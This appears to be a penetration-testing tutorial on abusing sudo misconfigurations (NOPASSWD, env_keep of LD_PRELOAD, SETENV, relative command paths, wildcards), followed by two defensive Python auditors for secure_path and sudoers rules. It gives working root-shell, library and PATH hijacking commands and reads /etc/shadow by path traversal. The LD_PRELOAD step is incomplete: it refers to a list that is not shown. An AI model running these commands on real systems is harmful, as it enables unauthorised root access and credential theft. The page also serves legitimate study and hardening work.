On this page we discuss specific sudo misconfigurations that can be leveraged to subvert sudo's intended functionality and elevate our privileges.
Practice
NOPASSWD
The following sudo configuration allows a user to execute a command with another user's privileges without being prompted for a password.
$ sudo -l
User demo may run the following commands on crashlab:
(root) NOPASSWD: /usr/bin/vim
If you can run a binary with sudo rights, have a look at GTFOBins, a curated list of Unix binaries that can be exploited to bypass local security restrictions. In the case of vim, we can spawn a shell with the following command:
sudo -u root vim -c '!sh'
LD_PRELOAD
LD_PRELOAD is an optional environment variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library, including the C runtime library (libc.so). This is called preloading a library.
If env_keep+=LD_PRELOAD is explicitly listed in the sudo -l output and you can run some command with sudo, you can escalate your privileges.
$ sudo -l
env_reset, env_keep+=LD_PRELOAD
User demo may run the following commands on crashlab:
(root) NOPASSWD: /usr/bin/find
Pick one of the shared objects from the list and hijack it by creating a file with the same name. For this demonstration, we target the libpcre2-8.so.0 file.
Then run the sudo binary with the LD_LIBRARY_PATH environment variable set:
#Use any command you can run with sudo
sudo LD_LIBRARY_PATH=/tmp <COMMAND>
#Example
sudo LD_LIBRARY_PATH=/tmp /usr/bin/find
SETENV
The SETENV directive allows the user to set environment variables while executing the command:
#Setenv on an arbitrary binary/script
$ sudo -l
env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh
#Setenv on binary/script without the full command path
$ sudo -l
env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
User waldo may run the following commands on admirer:
(ALL) SETENV: find
The previous example, based on the HTB machine Admirer, was vulnerable to PYTHONPATH hijacking, which loads an arbitrary Python library while the script executes as root:
#Sudo with modified PYTHONPATH
sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
Alternatively, you can set the PATH environment variable if you can sudo a binary that is specified without its full path.
#Create a malicious find executable
echo '/bin/bash -p' > /tmp/find
chmod +x /tmp/find
#Sudo with modified PATH
sudo PATH=/tmp:$PATH find
Command Path Hijacking
If we can execute some command as root but env_reset and secure_path are set, we cannot override the PATH environment variable.
Instead, when the sudo rule specifies the binary without its full path, we need to check whether we have write permission on each directory in secure_path.
$ sudo -l
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User demo may run the following commands on crashlab:
(root) python /home/user/example.py
Check whether each directory in secure_path, and each of its parent directories, is writable:
ls -al /usr/local/
ls -al /usr/
ls -al /
Assuming we can write an arbitrary binary under /usr/sbin, we can place a payload there. For example, we create a python binary under /usr/sbin, which is searched before /usr/bin in the secure_path shown above.
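To make the permission check above systematic, here is an added example (not code from the original page) that walks every directory in the secure_path quoted above, and each of its parents, and reports ownership or mode bits that would let a non-root user place a file there. The demo() function builds a constructed directory tree under a temporary directory with a deliberately world-writable usr/sbin and a missing snap directory, so it runs offline; on a live host you would call audit_secure_path with the default root="" and trusted=(0, 0).

```python
import os
import shutil
import stat
import tempfile

# secure_path as shown in the sudo -l output above.
SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"


def ancestors(path):
    """'/usr/local/sbin' -> ['/', '/usr', '/usr/local', '/usr/local/sbin']."""
    parts = [p for p in path.split("/") if p]
    return ["/"] + ["/" + "/".join(parts[: i + 1]) for i in range(len(parts))]


def writable_by_others(st, trusted_uid=0, trusted_gid=0):
    """Reasons why a directory with stat result `st` could be modified by
    someone other than the trusted owner (root by default)."""
    reasons = []
    if st.st_uid != trusted_uid:
        reasons.append(f"owned by uid {st.st_uid}")
    if st.st_mode & stat.S_IWGRP and st.st_gid != trusted_gid:
        reasons.append(f"group-writable by gid {st.st_gid}")
    if st.st_mode & stat.S_IWOTH:
        # A sticky world-writable dir still lets anyone create new files in it.
        sticky = " (sticky)" if st.st_mode & stat.S_ISVTX else ""
        reasons.append("world-writable" + sticky)
    return reasons


def audit_secure_path(secure_path, root="", trusted=(0, 0)):
    """Map each risky directory (or the first missing component) to the
    reasons it was flagged. `root` lets the check run against a sample tree."""
    findings = {}
    seen = set()
    for directory in secure_path.split(":"):
        for component in ancestors(directory):
            if component in seen:
                continue
            seen.add(component)
            real = os.path.join(root, component.lstrip("/")) if root else component
            try:
                st = os.stat(real)  # follow symlinks: merged-/usr systems link /bin
            except FileNotFoundError:
                # A missing component is worth knowing about: whoever can
                # create it controls everything sudo would search below it.
                findings[component] = ["missing"]
                break
            reasons = writable_by_others(st, *trusted)
            if reasons:
                findings[component] = reasons
    return findings


def demo():
    """Constructed sample tree: only usr/sbin is loose, snap is absent."""
    base = tempfile.mkdtemp(prefix="securepath-")
    layout = {"usr/local/sbin": 0o755, "usr/local/bin": 0o755, "usr/sbin": 0o777,
              "usr/bin": 0o755, "sbin": 0o755, "bin": 0o755}
    try:
        for rel, mode in layout.items():
            os.makedirs(os.path.join(base, rel), exist_ok=True)
            os.chmod(os.path.join(base, rel), mode)
        for rel in ("usr", "usr/local"):
            os.chmod(os.path.join(base, rel), 0o755)
        # The sandbox is owned by this process, so treat its uid/gid as trusted
        # and let only the deliberately loose mode bits show up.
        st = os.stat(os.path.join(base, "usr", "sbin"))
        return audit_secure_path(SECURE_PATH, root=base, trusted=(st.st_uid, st.st_gid))
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for path, reasons in demo().items():
        print(f"{path}: {', '.join(reasons)}")
```

Because sudo searches secure_path left to right, a writable directory that precedes the one holding the real binary is what matters, which is why the parents are checked too: a writable /usr/local would let someone replace /usr/local/sbin wholesale.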
If we can execute some command as root and its rule contains a wildcard, we may use symlinks, path traversal or multiple arguments to exploit it.
$ sudo -l
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User demo may run the following commands on crashlab:
(root): /bin/less /var/log/*
We can exploit it with the path traversal technique:
sudo less /var/log/../../etc/shadow
or with the symlink technique:
ln /etc/shadow /var/log/new
sudo less /var/log/new
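Every misconfiguration on this page (NOPASSWD, env_keep of LD_PRELOAD, SETENV, a command listed without its full path, and a wildcard in the command's arguments) is visible in the sudoers rules themselves, so a defender can find them before an attacker does. The following is an added example, not code from the original page: a small linter over /etc/sudoers-style rules (the syntax of the file, not of sudo -l output). The sample rules are constructed for this demonstration from the sudo -l listings quoted above and are not taken from any real host.

```python
import re

# Constructed sample, mirroring the sudo -l listings quoted on this page.
SAMPLE_SUDOERS = """\
# constructed sample sudoers for the linter demo
Defaults env_reset, env_keep+=LD_PRELOAD
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
demo   ALL=(root) NOPASSWD: /usr/bin/vim
waldo  ALL=(ALL) SETENV: /opt/scripts/admin_tasks.sh
waldo  ALL=(ALL) SETENV: find
demo   ALL=(root) /bin/less /var/log/*
ops    ALL=(root) /usr/bin/systemctl restart nginx
"""

# Variables that let the invoking user change which code a privileged command loads.
DANGEROUS_ENV = {"LD_PRELOAD", "LD_LIBRARY_PATH", "PATH", "PYTHONPATH", "PERL5LIB"}

DEFAULTS_RE = re.compile(r"^Defaults(?:[:@!>]\S+)?\s+(.*)$")
# user  host=(runas) [TAG: ...] command [args], command list may be comma separated
SPEC_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")
TAG_RE = re.compile(
    r"^(NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC|MAIL|NOMAIL|FOLLOW|NOFOLLOW|"
    r"LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT):\s*"
)
ENV_KEEP_RE = re.compile(r'^env_keep\s*\+?=\s*"?([^"]+?)"?$')


def audit_defaults(options):
    """Flag Defaults options that weaken sudo's environment sanitisation."""
    findings = []
    for opt in (o.strip() for o in options.split(",")):
        if opt == "!env_reset":
            findings.append(("Defaults", "ENV_RESET_DISABLED", opt))
        m = ENV_KEEP_RE.match(opt)
        if m:
            for var in m.group(1).split():
                if var in DANGEROUS_ENV:
                    findings.append(("Defaults", "ENV_KEEP", var))
    return findings


def audit_user_spec(user, cmdlist):
    """Flag risky commands in one user specification. Tags carry over to the
    following commands in the list until the opposite tag resets them."""
    findings = []
    tags = set()
    for entry in (c.strip() for c in cmdlist.split(",")):
        while True:
            m = TAG_RE.match(entry)
            if not m:
                break
            tag = m.group(1)
            tags.discard(tag[2:] if tag.startswith("NO") else "NO" + tag)
            tags.add(tag)
            entry = entry[m.end():]
        if not entry:
            continue
        if entry == "ALL":
            findings.append((user, "ALL_COMMANDS", entry))
            continue
        if "NOPASSWD" in tags:
            findings.append((user, "NOPASSWD", entry))
        if "SETENV" in tags:
            findings.append((user, "SETENV", entry))
        if not entry.split()[0].startswith("/"):
            findings.append((user, "RELATIVE_PATH", entry))   # resolved via PATH/secure_path
        if any(ch in entry for ch in "*?["):
            findings.append((user, "WILDCARD", entry))        # glob matched against arguments
    return findings


def audit_sudoers(text):
    """Return (scope, code, detail) findings for every rule in `text`."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.split()[0].endswith("_Alias"):
            continue
        m = DEFAULTS_RE.match(line)
        if m:
            findings += audit_defaults(m.group(1))
            continue
        m = SPEC_RE.match(line)
        if m:
            user, _host, _runas, cmdlist = m.groups()
            findings += audit_user_spec(user, cmdlist)
    return findings


if __name__ == "__main__":
    for scope, code, detail in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{scope:10} {code:20} {detail}")
```

Running it over the sample reports the env_keep of LD_PRELOAD, the NOPASSWD vim rule, both SETENV rules, the relative-path find rule and the wildcard in the less rule, while the fully qualified systemctl rule passes; each NOPASSWD hit is also worth checking against GTFOBins by hand, as the page suggests.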